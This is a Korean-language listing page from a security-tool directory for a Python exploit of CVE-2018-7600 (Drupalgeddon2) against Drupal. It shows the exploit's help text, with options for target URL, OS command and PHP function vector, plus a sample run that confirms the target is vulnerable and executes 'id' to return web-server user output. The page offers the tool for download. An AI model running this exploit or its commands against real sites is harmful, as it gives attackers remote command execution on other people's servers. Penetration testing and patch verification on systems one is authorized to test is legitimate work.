Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
drupalgeddon2-CVE-2018-7600 — CVE-2018-7600 (Drupalgeddon2)에 대한 Python 익스플로잇으로, Forms API의 프로퍼티 인젝션을 통해 취약한 Drupal 사이트에서 원격 명령 실행을 가능하게 하며, 내장된 취약점 테스트 및 프록시 지원 기능을 제공합니다. | Kitploit
도구/GitHubGitHub/rb4c/drupalgeddon2-cve-2018-7600
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubrb4c/drupalgeddon2-cve-2018-7600

drupalgeddon2-CVE-2018-7600

CVE-2018-7600 (Drupalgeddon2)에 대한 Python 익스플로잇으로, Forms API의 프로퍼티 인젝션을 통해 취약한 Drupal 사이트에서 원격 명령 실행을 가능하게 하며, 내장된 취약점 테스트 및 프록시 지원 기능을 제공합니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
4년 전아직 검토되지 않음

Drupal - Drupalgeddon2 (CVE 2018-7600)

root@kitploit:~
$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
usage: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]

[!] This script exploits (CVE-2018-7600) a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

optional arguments:
  -h, --help                        show this help message and exit
  --url URL, -u URL                 URL of target Drupal site (ex: http://target.com/)
  --command COMMAND, -c COMMAND     OS Command to execute
  --function FUNCTION, -f FUNCTION  Function to use as attack vector (default = passthru)
  --test                            Test if target is vulnerable
  --proxy PROXY, -p PROXY           Configure a proxy in the format http://127.0.0.1:8080/ (default = none)
root@kitploit:~
$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
[+] Sending request to: http://127.0.0.1
[+] Testing if: http://127.0.0.1 is vulnerable
[!] Target is vulnerable to CVE-2018-7600
[+] Triggering exploit to execute: id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
도구 다운로드